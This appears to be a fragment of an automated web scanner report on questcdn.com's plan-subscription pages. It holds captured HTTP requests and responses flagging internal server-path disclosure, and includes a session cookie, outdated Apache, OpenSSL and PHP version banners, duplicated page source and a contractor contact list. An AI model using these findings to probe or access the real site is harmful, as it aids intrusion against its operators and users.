size="3"><b>Phone/Fax</b></font></td> <td></td> <td colspan="3"><font size="3"><b>E-mail</b></font></td> </tr> <tr height="10"> <td width="10" height="10"></td> <td width="120" height="10"></td> <td width="10" height="10"></td> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="95" height="10"></td> <td width="10" height="10"></td> <td width="120" height="10"></td> <td width="10" height="10"></td> <td width="80" height="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Phoenix Fabricators and Erectors<br> Jonathan R. Dixon</font></td> <td></td> <td><font size="3">1329 US Hwy 41 N<br> P.O. Box 40<br> Sebree, KY 42455</font></td> <td></td> <td valign="top"><font size="3">2708352600<br> 2708359996</font></td> <td></td> <td valign="top" colspan="3"><font size="3">jonathan.dixon@phoenixtank.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">CB&I Inc. <br> Steven R. Brock</font></td> <td></td> <td><font size="3">1000 Remington Blvd. <br> Suite 105B<br> Bolingbrook, IL 60440</font></td> <td></td> <td valign="top"><font size="3">630-378-7664<br> 630-378-7601</font></td> <td></td> <td valign="top" colspan="3"><font size="3">sbrock@cbi.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">General Construction Services, Inc.<br> David Webb</font></td> <td></td> <td><font size="3">222 Commercial Street<br> <br> Stillwater, MN 55082</font></td> <td></td> <td valign="top"><font size="3">651.275.0114<br> 651.275.0115</font></td> <td></td> <td valign="top" colspan="3"><font size="3">dwebb@gentank.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Caldwell Tanks, Inc.<br> Carolyn E. Burke</font></td> <td></td> <td><font size="3">4000 Tower Road<br> <br> Louisville, KY 40219</font></td> <td></td> <td valign="top"><font size="3">502-964-3361<br> 502-966-8732</font></td> <td></td> <td valign="top" colspan="3"><font size="3">cburke@caldwelltanks.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Landmark Structures I, L.P.<br> Glendy Curry</font></td> <td></td> <td><font size="3">1665 Harmon Road<br> <br> Fort Worth, TX 76177</font></td> <td></td> <td valign="top"><font size="3">817/439-8888<br> 817-230-2070</font></td> <td></td> <td valign="top" colspan="3"><font size="3">estimating@teamlandmark.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Fargo Water Equipment Company<br> Fargo Water Equipment</font></td> <td></td> <td><font size="3">PO Box 128<br> 4557 15th Avenue North<br> Fargo, ND 58102</font></td> <td></td> <td valign="top"><font size="3">701-237-0222<br> 701-237-9609</font></td> <td></td> <td valign="top" colspan="3"><font size="3">emily@fgoh2o.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Ferguson Waterworks - Fargo<br> Mike O'Neill</font></td> <td></td> <td><font size="3">1917 1st Ave N<br> <br> Fargo, ND 58102</font></td> <td></td> <td valign="top"><font size="3">701-293-5511<br> 701-232-8129</font></td> <td></td> <td valign="top" colspan="3"><font size="3">moneill@nwws.biz</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Maguire Iron, Inc.<br> Troy Werdel</font></td> <td></td> <td><font size="3">P.O. Box 1446<br> <br> Sioux Falls, SD 57101</font></td> <td></td> <td valign="top"><font size="3">605-334-9749<br> 605-334-9752</font></td> <td></td> <td valign="top" colspan="3"><font size="3">werdelt@maguireiron.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td valign="top"> </td> <td valign="top"><font size="3">Plant & Flanged Equipment Company<br> Dustin Bremness</font></td> <td></td> <td><font size="3">10101 Xylite Street NE<br> <br> Blaine, MN 55449-5227</font></td> <td></td> <td valign="top"><font size="3">763-792-3870<br> 763-792-3876</font></td> <td></td> <td valign="top" colspan="3"><font size="3">db@plantandflanged.com</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="20"> <td colspan="10"></td> </tr> <tr height="10"> <td width="25" height="10"></td> <td height="10" colspan="9"><font face="Verdana" size="3">Manual Planholders</font></td> </tr> <tr height="10"> <td colspan="10"></td> </tr> <tr height="10"> <td></td> <td><font size="3"><b>Company/Contact</b></font></td> <td></td> <td><font size="3"><b>Address</b></font></td> <td></td> <td><font s..
|
- /qap/subscribe/sub_form.html
/qap/subscribe/sub_form.html |
Identified Internal Path(s)
/home/cvsroot/ipp.questcdn.com/www/subscribe/sub_form.html,v
Request
GET /qap/subscribe/sub_form.html?root_page=true%20download_type=plan%20jobCategoryNo=%3C?p:jobCategoryNo?%3E%20jobNo=%3C?p:jobNo?%3E%20member_no=%3C?s:subscriberPK?%3E%20provider=%3C?p:provider?%3E HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&calling_function=%3Fcalling_function&provider=453856&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:45 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:45 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 65717
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/subscribe/sub_form.html,v 1.4 2005/09/13 17:43:45 gkloke Exp $--><html><script language="JavaScript"><!--// This will resize the window when it is opened or// refresh/reload is clicked to a width and height of 500 x 500// with is placed first, height is placed secondwindow.resizeTo(750,650)--></script> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <META NAME="ROBOTS" CONTENT="NOINDEX,NOFOLLOW"> <title>QUESTCDN: Subscription</title> <script language="JavaScript1.2" src="/qap/j_scripts/macSize_i.js"></script> <script language="JavaScript1.2" src="/qap/j_scripts/validation.js"></script> <script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script language="javascript"> function PasswordsMatch() { isValid = true; if ( isEmpty(document.UserInfo.password.value) || isEmpty(document.UserInfo.pasword_con.value)) { UserMsg = "Please fill in both the PASSWORD and CONFIRM PASSWORD fields."; isValid = false; } else { if ( document.UserInfo.password.value != document.UserInfo.pasword_con.value) { UserMsg = "Password and confirming password don't match."; isValid = false; } } return isValid; } function VerifyInput(action) { isValid = true; UserMsg = 'Please enter the following data:\n'; if ( isEmpty(document.UserInfo.co_name.value) ) { UserMsg = UserMsg + "\n Company Name"; isValid = false; } if ( isEmpty(document.UserInfo.contact_name.value) ) { UserMsg = UserMsg + "\n Contact person"; isValid = false; } if ( isEmpty(document.UserInfo.main_contact_email.value) ) { UserMsg = UserMsg + "\n Company contact e-mail address"; isValid = false; } else if ( !validateEmail(document.UserInfo.main_contact_email.value) ) { UserMsg = UserMsg + "\n Company contact e-mail address is in an invalid format"; isValid = false; } if ( isEmpty(document.UserInfo.default_designation.value) ) { UserMsg = UserMsg + "\n Default Designation"; isValid = false; } if ( isEmpty(document.UserInfo.co_address1.value) ) { UserMsg = UserMsg + "\n Location address 1"; isValid = false; } if ( isEmpty(document.UserInfo.co_city.value) ) { UserMsg = UserMsg + "\n Location city"; isValid = false; } if ( isEmpty(document.UserInfo.co_state.value) ) { UserMsg = UserMsg + "\n Location state"; isValid = false; } if ( isEmpty(document.UserInfo.co_zip.value) ) { UserMsg = UserMsg + "\n Location zip code"; isValid = false; } if ( isEmpty(document.UserInfo.co_phone.value) ) { UserMsg = UserMsg + "\n Location phone number"; isValid = false; } if ( !validateEmail(document.UserInfo.location_email.value, true) ) { UserMsg = UserMsg + "\n Company e-mail address is in an invalid format"; isValid = false; } if ( isEmpty(document.UserInfo.bil_address1.value) ) { UserMsg = UserMsg + "\n Billing address line 1."; isValid = false; } if ( isEmpty(document.UserInfo.bil_city.value) ) { UserMsg = UserMsg + "\n Billing city."; isValid = false; } if ( isEmpty(document.UserInfo.bil_state.value) ) { UserMsg = UserMsg + "\n Billing state."; isValid = false; } if ( isEmpty(document.UserInfo.bil_zip.value) ) { UserMsg = UserMsg + "\n Billing zip code."; isValid = false; } if ( isEmpty(document.UserInfo.bil_name.value) ) { UserMsg = UserMsg + "\n Name on credit card"; isValid = false; } if ( isEmpty(document.UserInfo.cc_number.value) ) { UserMsg = UserMsg + "\n Number on credit card"; isValid = false; } else {//has a card number so test it if ( !checkCreditCard(document.UserInfo.cc_number.value) ) { UserMsg = UserMsg + "\n Valid credit card number"; isValid = false; } else if ( !checkCardType2(document.UserInfo.cc_number.value) ) { UserMsg = UserMsg + "\n Valid credit card type"; isValid = false; } } if ( isEmpty(document.UserInfo.username.value) ) { UserMsg = UserMsg + "\n User name"; isValid = false; } if ( isEmpty(document.UserInfo.password.value) ) { UserMsg = UserMsg + "\n Password"; isValid = false; } if ( isEmpty(document.UserInfo.pasword_con.value) ) { UserMsg = UserMsg + "\n Confirming password"; isValid = false; } if ( SelectIsEmpty(document.UserInfo.industry_directory_multi) ) { UserMsg = UserMsg + "\n Choose at least 1 selection from the Industry Directory"; isValid = false; } return isValid; } function checkCreditCard(card_number) { var n = String(card_number); var j = 0 var s1 = new Array(); for( var i=0; i < n.length; i++) { if( !isNaN(n.charAt(i)) ) { s1[j] = "" + n.charAt(i); j++; } } var checksum = 0; for( var i = s1.length-1; i >= 0; i-= 2) { var k = 0; if (i > 0) { k = 2 * new Number(s1[i-1]); if (k>9) { var s = "" + k; k = new Number(s.substring(0,1)) + new Number(s.substring(1)); } checksum += k + new Number(s1[i]); } else { checksum += new Number(s1[0]); } } return ((checksum % 10) == 0); } /** * Get the Card type * returns the credit card type * -1 = INVALID * 0 = VISA * 1 = MASTERCARD * 2 = AMERICAN_EXPRESS * 3 = EN_ROUTE * 4 = DINERS_CLUB */ function checkCardType(card_number) { //first remove non-numbers var n = String(card_number); var number = ""; for( var i=0; i < n.length; i++) { if( !isNaN(n.charAt(i)) ) { number += n.charAt(i); } } var valid = -1; //invalid if (number.length >= 4) { var digit1 = number.substring(0,1); var digit2 = number.substring(0,2); var digit3 = number.substring(0,3); var digit4 = number.substring(0,4); if ( !isNaN(number)) {//is a number if (digit1 == "4") {// VISA prefix=4, length = 13 or 16 if (number.length == 13 || number.length == 16) valid = 0; //VISA } else if (new Number(digit2) >= 51 && new Number(digit2) <= 55 ) {// MASTERCARD prefix= 51 ... 55, length = 16 if (number.length == 16) valid = 1; //MASTERCARD } else if (digit2 == "34" || digit2 == "37") {// AMEX prefix=34 or 37, length=15 if (number.length == 15) valid = 2; //AMERICAN_EXPRESS } else if (digit4 == "2014" || digit4 == "2149") {// ENROU prefix=2014 or 2149, length=15 if (number.length == 15) valid = 3; //EN_ROUTE } else if (digit2 == "36" || digit2 == "38" || (new Number(digit3) >= 300 && new Number(digit3) <= "305") ) {// DCLUB prefix=300 ... 305 or 36 or 38, length=14 if (number.length == 14) valid = 4; //DINERS_CLUB } } } return valid; } function checkCardType2(card_number) { //0=visa, 1=mastercard, 2=amex var success = false; var result = checkCardType(card_number); var cc_types = document.UserInfo.CC_type; if( (result == 0 && cc_types[0].checked == true) || //visa (result == 1 && cc_types[1].checked == true) || //mastercard (result == 2 && cc_types[2].checked == true) ) //amex success = true; return success; } function DoSave() { if ( document.UserInfo.download_type.value == "plan" ) { document.UserInfo.action = "/qap/action/saveSubscriber"; } else { document.UserInfo.action = "/qap/action/saveSubscriberAddenda"; } document.UserInfo.submit(); } function SaveData() { var hWnd; //get the member_charge_type to be used in the agreement form before saving the new subscriber for(var i = 0; i < document.UserInfo.member_charge_type.length; i++) { if( document.UserInfo.member_charge_type[i].checked == true ) document.UserInfo.member_charge_type_id.value = document.UserInfo.member_charge_type[i].value; } if ( VerifyInput() && PasswordsMatch()) { var hWnd = window.open("/qap/subscribe/sub_par_agree.html?member_charge_type_id="+document.UserInfo.member_charge_type_id.value,"","width=400,height=480,scrollbars"); if ((document.window != null) && (!hWnd.opener)) hWnd.opener = document.window; } else { alert(UserMsg); } }</script> </head> <body bgcolor="white"> <form name="UserInfo" action="/qap/action/" method="post"> <input type="hidden" name="UserType" value="0"> <input type="hidden" name="member_charge_type_id" > <input type="hidden" name="download_type" value=""> <input type="hidden" name="jobCategoryNo" value=> <input type="hidden" name="provider" value=> <input type="hidden" name="jobNo" value=> <table cool width="603" height="1562" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy> <tr height="1" cntrlrow> <td width="1" height="1"></td> <td width="600" height="1"><spacer type="block" width="600" height="1"></td> </tr> <tr height="78"> <td width="1" height="78"><spacer type="block" width="1" height="78"></td> <td width="600" height="78" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="600"> <tr height="28"> <td width="277" rowspan="2" valign="top"><img height="50" width="277" src="/qap/images/banners/ba_main_left.gif"></td> <td width="323" height="28"> <div align="right"> <a href="mailto:info@questcdn.com"><img height="28" width="120" src="/qap/images/buttons/bu_contact.gif" border="0"></a></div> </td> </tr> <tr height="22"> <td width="323" valign="bottom" height="22"><img height="22" width="323" src="/qap/images/banners/ba_main_right.gif"></td> </tr> <tr> <td width="277"></td> <td width="323"> <div align="right"> <img height="28" src="/qap/images/buttons/bd_join_join.gif"><img height="28" width="101" src="/qap/images/buttons/bu_classif.gif"><img height="28" width="57" src="/qap/images/buttons/bu_faq.gif"></div> </td> </tr> </table> </td> </tr> <tr height="1481"> <td width="1" height="1481"><spacer type="block" width="1" height="1481"> <td width="600" height="1481" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="600"> <tr height="12"> <td height="12" width="140"></td> <td width="10" height="12"></td> <td width="450" height="12"></td> </tr> <tr height="12"> <td height="12" width="140"></td> <td width="10" height="12"></td> <td width="450" height="12"></td> </tr> <tr height="12"> <td height="12" width="140"></td> <td width="10" height="12"></td> <td width="450" height="12"><font face="Verdana"><b>Member Information</b></font></td> </tr> <tr> <td valign="top" width="140"><br> <font size="2">Please complete the required fields that are marked with an asterisk "*"</font></td> <td width="10"></td> <td width="450" valign="top"><font face="Verdana"><b> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td height="10" width="290"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*name of company:</span></font></div> </td> <td width="10"></td> <td width="290"><input type="text" name="co_name" size="37" maxlength="50" value="" ></td> </tr> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td height="10" width="290"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*contact person:</span></font></div> </td> <td width="10"></td> <td width="290"><input type="text" name="contact_name" size="37" maxlength="50" value="" ></td> </tr> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="290" height="10"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*e-mail address:</span></font></div> </td> <td width="10"></td> <td width="290"><input type="text" name="main_contact_email" size="37" maxlength="50" value="" ></td> </tr> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="290" height="10"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*default designation:</span></font> </div> </td> <td width="10"></td> <td width="290"><select name="default_designation"> <option value=""></option> <option value="1158357">A/E Consultant</option> <option value="1158382">Bonding/Surety</option> <option value="1158358">Government Agency</option> <option value="1140734">Other</option> <option value="1158334">Owner</option> <option value="1140731">Plan Room</option> <option value="1">Prime</option> <option value="1158349">Project Solicitor</option> <option value="1451973">Reprographic Printer</option> <option value="2">Sub</option> <option value="3">Supplier</option> <option value="1158331">Unknown</option></select></td> </tr><!---- start business type selection ---------------------------------------------------------------------------------------><!-- the following row is just for spacing --> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="290" height="10"></td> </tr> <tr height="25"> <td width="150" height="25" valign="top"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">business types:<br> (check all that apply )<br> (CTRL-click to pick more than one )</span></font></div> </td> <td width="10" height="25"></td> <td width="290" height="25" valign="top"> <table border="0" cellpadding="0" cellspacing="0" width="260"> <tr height="25"> <td width="10" height="25"></td> <td width="260" height="25" valign="top"> <table border="0" cellpadding="0" cellspacing="0" width="260"> <select NAME="bustype_listing_multi" size=5 MULTIPLE> <option VALUE="1140346" >SBE</option> <option VALUE="1" >DBE</option>..
Date: Tue, 01 Mar 2011 20:01:45 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:45 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 65717
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/subscribe/sub_form.html,v 1.4 2005/09/13 17:43:45 gkloke Exp $--><html><script language="JavaScript"><!--// This will resize the window when it is opened or// refresh/reload is clicked to a width and height of 500 x 500// with is placed first, height is placed secondwindow.resizeTo(750,650)--></script> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta name="generator" content="Adobe GoLive 4"> <META NAME="ROBOTS" CONTENT="NOINDEX,NOFOLLOW"> <title>QUESTCDN: Subscription</title> <script language="JavaScript1.2" src="/qap/j_scripts/macSize_i.js"></script> <script language="JavaScript1.2" src="/qap/j_scripts/validation.js"></script> <script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script language="javascript"> function PasswordsMatch() { isValid = true; if ( isEmpty(document.UserInfo.password.value) || isEmpty(document.UserInfo.pasword_con.value)) { UserMsg = "Please fill in both the PASSWORD and CONFIRM PASSWORD fields."; isValid = false; } else { if ( document.UserInfo.password.value != document.UserInfo.pasword_con.value) { UserMsg = "Password and confirming password don't match."; isValid = false; } } return isValid; } function VerifyInput(action) { isValid = true; UserMsg = 'Please enter the following data:\n'; if ( isEmpty(document.UserInfo.co_name.value) ) { UserMsg = UserMsg + "\n Company Name"; isValid = false; } if ( isEmpty(document.UserInfo.contact_name.value) ) { UserMsg = UserMsg + "\n Contact person"; isValid = false; } if ( isEmpty(document.UserInfo.main_contact_email.value) ) { UserMsg = UserMsg + "\n Company contact e-mail address"; isValid = false; } else if ( !validateEmail(document.UserInfo.main_contact_email.value) ) { UserMsg = UserMsg + "\n Company contact e-mail address is in an invalid format"; isValid = false; } if ( isEmpty(document.UserInfo.default_designation.value) ) { UserMsg = UserMsg + "\n Default Designation"; isValid = false; } if ( isEmpty(document.UserInfo.co_address1.value) ) { UserMsg = UserMsg + "\n Location address 1"; isValid = false; } if ( isEmpty(document.UserInfo.co_city.value) ) { UserMsg = UserMsg + "\n Location city"; isValid = false; } if ( isEmpty(document.UserInfo.co_state.value) ) { UserMsg = UserMsg + "\n Location state"; isValid = false; } if ( isEmpty(document.UserInfo.co_zip.value) ) { UserMsg = UserMsg + "\n Location zip code"; isValid = false; } if ( isEmpty(document.UserInfo.co_phone.value) ) { UserMsg = UserMsg + "\n Location phone number"; isValid = false; } if ( !validateEmail(document.UserInfo.location_email.value, true) ) { UserMsg = UserMsg + "\n Company e-mail address is in an invalid format"; isValid = false; } if ( isEmpty(document.UserInfo.bil_address1.value) ) { UserMsg = UserMsg + "\n Billing address line 1."; isValid = false; } if ( isEmpty(document.UserInfo.bil_city.value) ) { UserMsg = UserMsg + "\n Billing city."; isValid = false; } if ( isEmpty(document.UserInfo.bil_state.value) ) { UserMsg = UserMsg + "\n Billing state."; isValid = false; } if ( isEmpty(document.UserInfo.bil_zip.value) ) { UserMsg = UserMsg + "\n Billing zip code."; isValid = false; } if ( isEmpty(document.UserInfo.bil_name.value) ) { UserMsg = UserMsg + "\n Name on credit card"; isValid = false; } if ( isEmpty(document.UserInfo.cc_number.value) ) { UserMsg = UserMsg + "\n Number on credit card"; isValid = false; } else {//has a card number so test it if ( !checkCreditCard(document.UserInfo.cc_number.value) ) { UserMsg = UserMsg + "\n Valid credit card number"; isValid = false; } else if ( !checkCardType2(document.UserInfo.cc_number.value) ) { UserMsg = UserMsg + "\n Valid credit card type"; isValid = false; } } if ( isEmpty(document.UserInfo.username.value) ) { UserMsg = UserMsg + "\n User name"; isValid = false; } if ( isEmpty(document.UserInfo.password.value) ) { UserMsg = UserMsg + "\n Password"; isValid = false; } if ( isEmpty(document.UserInfo.pasword_con.value) ) { UserMsg = UserMsg + "\n Confirming password"; isValid = false; } if ( SelectIsEmpty(document.UserInfo.industry_directory_multi) ) { UserMsg = UserMsg + "\n Choose at least 1 selection from the Industry Directory"; isValid = false; } return isValid; } function checkCreditCard(card_number) { var n = String(card_number); var j = 0 var s1 = new Array(); for( var i=0; i < n.length; i++) { if( !isNaN(n.charAt(i)) ) { s1[j] = "" + n.charAt(i); j++; } } var checksum = 0; for( var i = s1.length-1; i >= 0; i-= 2) { var k = 0; if (i > 0) { k = 2 * new Number(s1[i-1]); if (k>9) { var s = "" + k; k = new Number(s.substring(0,1)) + new Number(s.substring(1)); } checksum += k + new Number(s1[i]); } else { checksum += new Number(s1[0]); } } return ((checksum % 10) == 0); } /** * Get the Card type * returns the credit card type * -1 = INVALID * 0 = VISA * 1 = MASTERCARD * 2 = AMERICAN_EXPRESS * 3 = EN_ROUTE * 4 = DINERS_CLUB */ function checkCardType(card_number) { //first remove non-numbers var n = String(card_number); var number = ""; for( var i=0; i < n.length; i++) { if( !isNaN(n.charAt(i)) ) { number += n.charAt(i); } } var valid = -1; //invalid if (number.length >= 4) { var digit1 = number.substring(0,1); var digit2 = number.substring(0,2); var digit3 = number.substring(0,3); var digit4 = number.substring(0,4); if ( !isNaN(number)) {//is a number if (digit1 == "4") {// VISA prefix=4, length = 13 or 16 if (number.length == 13 || number.length == 16) valid = 0; //VISA } else if (new Number(digit2) >= 51 && new Number(digit2) <= 55 ) {// MASTERCARD prefix= 51 ... 55, length = 16 if (number.length == 16) valid = 1; //MASTERCARD } else if (digit2 == "34" || digit2 == "37") {// AMEX prefix=34 or 37, length=15 if (number.length == 15) valid = 2; //AMERICAN_EXPRESS } else if (digit4 == "2014" || digit4 == "2149") {// ENROU prefix=2014 or 2149, length=15 if (number.length == 15) valid = 3; //EN_ROUTE } else if (digit2 == "36" || digit2 == "38" || (new Number(digit3) >= 300 && new Number(digit3) <= "305") ) {// DCLUB prefix=300 ... 305 or 36 or 38, length=14 if (number.length == 14) valid = 4; //DINERS_CLUB } } } return valid; } function checkCardType2(card_number) { //0=visa, 1=mastercard, 2=amex var success = false; var result = checkCardType(card_number); var cc_types = document.UserInfo.CC_type; if( (result == 0 && cc_types[0].checked == true) || //visa (result == 1 && cc_types[1].checked == true) || //mastercard (result == 2 && cc_types[2].checked == true) ) //amex success = true; return success; } function DoSave() { if ( document.UserInfo.download_type.value == "plan" ) { document.UserInfo.action = "/qap/action/saveSubscriber"; } else { document.UserInfo.action = "/qap/action/saveSubscriberAddenda"; } document.UserInfo.submit(); } function SaveData() { var hWnd; //get the member_charge_type to be used in the agreement form before saving the new subscriber for(var i = 0; i < document.UserInfo.member_charge_type.length; i++) { if( document.UserInfo.member_charge_type[i].checked == true ) document.UserInfo.member_charge_type_id.value = document.UserInfo.member_charge_type[i].value; } if ( VerifyInput() && PasswordsMatch()) { var hWnd = window.open("/qap/subscribe/sub_par_agree.html?member_charge_type_id="+document.UserInfo.member_charge_type_id.value,"","width=400,height=480,scrollbars"); if ((document.window != null) && (!hWnd.opener)) hWnd.opener = document.window; } else { alert(UserMsg); } }</script> </head> <body bgcolor="white"> <form name="UserInfo" action="/qap/action/" method="post"> <input type="hidden" name="UserType" value="0"> <input type="hidden" name="member_charge_type_id" > <input type="hidden" name="download_type" value=""> <input type="hidden" name="jobCategoryNo" value=> <input type="hidden" name="provider" value=> <input type="hidden" name="jobNo" value=> <table cool width="603" height="1562" border="0" cellpadding="0" cellspacing="0" gridx="10" showgridx gridy="10" showgridy> <tr height="1" cntrlrow> <td width="1" height="1"></td> <td width="600" height="1"><spacer type="block" width="600" height="1"></td> </tr> <tr height="78"> <td width="1" height="78"><spacer type="block" width="1" height="78"></td> <td width="600" height="78" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="600"> <tr height="28"> <td width="277" rowspan="2" valign="top"><img height="50" width="277" src="/qap/images/banners/ba_main_left.gif"></td> <td width="323" height="28"> <div align="right"> <a href="mailto:info@questcdn.com"><img height="28" width="120" src="/qap/images/buttons/bu_contact.gif" border="0"></a></div> </td> </tr> <tr height="22"> <td width="323" valign="bottom" height="22"><img height="22" width="323" src="/qap/images/banners/ba_main_right.gif"></td> </tr> <tr> <td width="277"></td> <td width="323"> <div align="right"> <img height="28" src="/qap/images/buttons/bd_join_join.gif"><img height="28" width="101" src="/qap/images/buttons/bu_classif.gif"><img height="28" width="57" src="/qap/images/buttons/bu_faq.gif"></div> </td> </tr> </table> </td> </tr> <tr height="1481"> <td width="1" height="1481"><spacer type="block" width="1" height="1481"> <td width="600" height="1481" colspan="1" rowspan="1" valign="top" align="left" xpos="0"> <table border="0" cellpadding="0" cellspacing="0" width="600"> <tr height="12"> <td height="12" width="140"></td> <td width="10" height="12"></td> <td width="450" height="12"></td> </tr> <tr height="12"> <td height="12" width="140"></td> <td width="10" height="12"></td> <td width="450" height="12"></td> </tr> <tr height="12"> <td height="12" width="140"></td> <td width="10" height="12"></td> <td width="450" height="12"><font face="Verdana"><b>Member Information</b></font></td> </tr> <tr> <td valign="top" width="140"><br> <font size="2">Please complete the required fields that are marked with an asterisk "*"</font></td> <td width="10"></td> <td width="450" valign="top"><font face="Verdana"><b> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td height="10" width="290"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*name of company:</span></font></div> </td> <td width="10"></td> <td width="290"><input type="text" name="co_name" size="37" maxlength="50" value="" ></td> </tr> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td height="10" width="290"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*contact person:</span></font></div> </td> <td width="10"></td> <td width="290"><input type="text" name="contact_name" size="37" maxlength="50" value="" ></td> </tr> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="290" height="10"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*e-mail address:</span></font></div> </td> <td width="10"></td> <td width="290"><input type="text" name="main_contact_email" size="37" maxlength="50" value="" ></td> </tr> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="290" height="10"></td> </tr> <tr> <td width="150"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">*default designation:</span></font> </div> </td> <td width="10"></td> <td width="290"><select name="default_designation"> <option value=""></option> <option value="1158357">A/E Consultant</option> <option value="1158382">Bonding/Surety</option> <option value="1158358">Government Agency</option> <option value="1140734">Other</option> <option value="1158334">Owner</option> <option value="1140731">Plan Room</option> <option value="1">Prime</option> <option value="1158349">Project Solicitor</option> <option value="1451973">Reprographic Printer</option> <option value="2">Sub</option> <option value="3">Supplier</option> <option value="1158331">Unknown</option></select></td> </tr><!---- start business type selection ---------------------------------------------------------------------------------------><!-- the following row is just for spacing --> <tr height="10"> <td width="150" height="10"></td> <td width="10" height="10"></td> <td width="290" height="10"></td> </tr> <tr height="25"> <td width="150" height="25" valign="top"> <div align="right"> <font face="Verdana" size="1"><span class="macsize">business types:<br> (check all that apply )<br> (CTRL-click to pick more than one )</span></font></div> </td> <td width="10" height="25"></td> <td width="290" height="25" valign="top"> <table border="0" cellpadding="0" cellspacing="0" width="260"> <tr height="25"> <td width="10" height="25"></td> <td width="260" height="25" valign="top"> <table border="0" cellpadding="0" cellspacing="0" width="260"> <select NAME="bustype_listing_multi" size=5 MULTIPLE> <option VALUE="1140346" >SBE</option> <option VALUE="1" >DBE</option>..
|
- /qap/action/projects/prj_add_mod/prj_plan_add.html
/qap/action/projects/prj_add_mod/prj_plan_add.html |
Identified Internal Path(s)
/home/cvsroot/ipp.questcdn.com/www/projects/prj_add_mod/prj_plan_add.html,v
Request
GET /qap/action/projects/prj_add_mod/prj_plan_add.html HTTP/1.1
